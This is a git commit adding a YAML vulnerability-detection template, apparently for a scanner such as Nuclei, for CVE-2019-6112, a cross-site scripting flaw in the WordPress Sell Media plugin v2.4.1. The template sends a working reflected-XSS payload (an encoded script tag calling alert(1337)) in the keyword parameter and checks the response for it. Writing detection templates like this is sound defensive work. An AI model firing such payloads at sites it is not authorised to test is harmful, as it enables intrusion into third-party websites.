🔥 Add CVE-2019-6112

2020-08-16 22:22:28 +07:00 · 2020-08-16 22:22:28 +07:00 · 3d6f52fbbf
parent 04e7b37069
commit 3d6f52fbbf
1 changed files with 30 additions and 0 deletions
--- a/cves/CVE-2019-6112.yaml
+++ b/cves/CVE-2019-6112.yaml
@ -0,0 +1,30 @@
+id: CVE-2019-6112
+
+info:
+  name: WordPress Plugin Sell Media v2.4.1 - Cross-Site Scripting
+  author: dwisiswant0
+  severity: medium
+
+  # A Cross-site scripting (XSS) vulnerability
+  # in /inc/class-search.php in the Sell Media plugin v2.4.1 for WordPress
+  # allows remote attackers to inject arbitrary web script or HTML
+  # via the keyword parameter (aka $search_term or the Search field).
+  # --
+  # References:
+  # > https://github.com/graphpaperpress/Sell-Media/commit/8ac8cebf332e0885863d0a25e16b4b180abedc47#diff-f16fea0a0c8cc36031ec339d02a4fb3b
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/sell-media-search/?keyword=%22%3E%3Cscript%3Ealert%281337%29%3C%2Fscript%3E"
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "id=\"sell-media-search-text\" class=\"sell-media-search-text\""
+          - "alert(1337)"
+        condition: and
+        part: body
+      - type: status
+        status:
+          - 200